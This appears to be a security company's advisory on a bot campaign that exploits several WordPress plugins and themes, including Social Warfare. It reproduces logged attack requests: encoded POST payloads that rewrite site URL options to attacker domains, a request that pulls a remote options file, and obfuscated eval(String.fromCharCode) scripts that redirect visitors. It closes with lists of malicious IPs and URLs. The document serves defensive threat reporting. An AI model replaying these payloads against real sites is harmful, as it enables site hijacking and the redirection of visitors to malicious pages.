Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

We recently noticed an increase on suspicious requests in our logs which reveal a planned attack against the Social Warfare plugin. Bad actors added this brand new exploit to an existing campaign, which includes other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack


Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php

Malicious Domains and IPs:

IPs:

31.208.43.209
91.134.215.233
34.194.221.173
128.199.114.0
162.243.1.231
145.239.54.77
185.136.85.47
222.73.242.180
109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.js
hxxp://raiserate[.]com/mv.txt
hxxp://109.234 .34 .22/mv.txt
hxxps://verybeatifulpear[.]com
hxxps://blueeyeswebsite[.]com
hxxp://r-y-p[.]org/options.txt
hxxps://teutorrent.com/wp-includes/js/javascript-mini.js